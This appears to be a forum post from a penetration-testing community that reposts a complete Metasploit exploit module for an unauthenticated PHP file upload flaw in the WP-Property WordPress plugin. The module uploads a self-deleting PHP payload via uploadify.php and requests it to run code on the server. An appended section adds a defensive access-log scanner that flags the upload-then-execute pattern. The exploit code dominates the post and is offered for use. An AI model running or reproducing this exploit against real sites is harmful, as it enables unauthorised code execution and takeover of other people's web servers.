China Network Penetration Testing Alliance

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51
WordPress WP-Property PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                    This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end

Don't ask me what this is or how to use it. I mean, it's msf.
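
Added example, not part of the original post or of the Metasploit project: the module's payload is written with unlink_self, so the uploaded script may no longer be on disk and the web access log is the durable evidence. The sketch below scans Apache combined-format lines for the upload-then-request sequence in the uploadify directory; the sample log lines, addresses and function names are constructed for illustration.

```ruby
# Added example: flag access-log evidence of an upload to WP-Property's bundled
# uploadify.php followed by a request for a script in the same directory.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /

# Constructed sample lines (documentation-range addresses, made-up file name).
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
LOG

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[1], time: m[2], method: m[3], path: m[4].split('?').first, status: m[5].to_i }
end

# Returns findings tagged :probe (GET of the handler), :upload (POST to it) or
# :executed (request for any other PHP script inside the uploadify directory).
def detect_uploadify_abuse(log_text)
  log_text.each_line.filter_map do |line|
    e = parse_line(line.chomp)
    next unless e && e[:path].include?(UPLOADIFY_DIR)
    file = e[:path].split(UPLOADIFY_DIR, 2).last
    kind =
      if file == 'uploadify.php' then e[:method] == 'POST' ? :upload : :probe
      elsif file =~ /\.(php\d?|phtml)\z/i then :executed
      end
    kind && e.merge(kind: kind, file: file)
  end
end

# Source IPs with a successful upload and a script request in the same directory.
def compromised_sources(findings)
  findings.group_by { |f| f[:ip] }
          .select { |_, fs| fs.any? { |f| f[:kind] == :upload && f[:status] == 200 } &&
                            fs.any? { |f| f[:kind] == :executed } }
          .keys
end

if __FILE__ == $PROGRAM_NAME
  hits = detect_uploadify_abuse(SAMPLE_LOG)
  hits.each { |f| puts f.values_at(:time, :ip, :kind, :file, :status).join("\t") }
  puts "upload+execute from: #{compromised_sources(hits).join(', ')}"
end
```

Any hit of kind upload on a site running WP-Property <= 1.35.0 warrants checking the plugin version and removing or blocking direct access to the third-party/uploadify directory.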
